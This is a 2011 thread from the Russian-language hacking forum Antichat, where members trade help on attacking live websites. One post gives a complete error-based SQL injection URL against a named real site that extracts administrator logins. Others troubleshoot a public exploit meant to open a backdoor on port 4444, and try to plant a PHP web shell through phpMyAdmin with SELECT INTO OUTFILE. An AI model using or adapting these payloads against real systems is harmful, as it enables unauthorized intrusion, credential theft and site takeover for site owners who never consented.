ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
28.06.2011, 18:43
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от qaz
убрал, тотже ифект
вывода и не будет, потому что это блайнд. в данном случае можно добиться вывода в ошибке. раскрутил по методу qwazar'a :
Код HTML:
http://jetterauto.ru/index/page/id/411+and+1=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cms_user_list.login,0x27,0x7e)+from+mainfra_jetter_tst.cms_user_list+order+by+login+limit+0,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1
|
|
|
28.06.2011, 19:46
|
|
Участник форума
Регистрация: 08.03.2011
Сообщений: 149
Провел на форуме:
34360
Репутация:
1
|
|
Сообщение от plaeer
Я тоже смотрел код сплоита, и не увидел там ничего связанного с портом 4444. Поэтому предположил, что в sos.txt код бэкдора который открыл порт 4444. хз где взять этот код...
Что никто не может помочь?
|
|
|
|
28.06.2011, 20:31
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от plaeer
Что никто не может помочь?
Товарищ, не знаю что за эксплоит но примерно я бы сделал такой вывод - если там написано, чтобы я проверил наличие файла sos.txt а его там нету значит эксплоит не заработал, может потому, что уязвимое ПО запатчено.
|
|
|
|
28.06.2011, 21:37
|
|
Участник форума
Регистрация: 08.03.2011
Сообщений: 149
Провел на форуме:
34360
Репутация:
1
|
|
Сообщение от R0nin
Товарищ, не знаю что за эксплоит но примерно я бы сделал такой вывод - если там написано, чтобы я проверил наличие файла sos.txt а его там нету значит эксплоит не заработал, может потому, что уязвимое ПО запатчено.
Вообще-то эту уязвимость обнаружил сканер.
|
|
|
|
28.06.2011, 21:38
|
|
Участник форума
Регистрация: 08.03.2011
Сообщений: 149
Провел на форуме:
34360
Репутация:
1
|
|
Сам сплоит - http://www.securitylab.ru/poc/391481.php
|
|
|
|
28.06.2011, 22:25
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от plaeer
Сам сплоит - http://www.securitylab.ru/poc/391481.php
Сканер может ошибится.
ПО может иметь уязвимую версию но при этом таки может быть пропатченным.
|
|
|
|
28.06.2011, 22:32
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от plaeer
Вообще-то эту уязвимость обнаружил сканер.
Ну раз сканер, тогда это координально меняет ситуацию
|
|
|
|
29.06.2011, 13:28
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Траблы с залитием шела через phpmyadmin
File_priv : Y
Делаю запрос :
SELECT '' into OUTFILE '/var/www/html/web/site.com/shell.php'
Мне в ответ:
#1 - Can't create/write to file '/var/www/html/web/site.com/shell.php' (Errcode: 13)
Почему вылазит такая ошибка и файл не создается?
|
|
|
|
29.06.2011, 13:30
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Прав нет же
На запись в папку.
|
|
|
|
29.06.2011, 20:19
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117
Репутация:
76
|
|
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
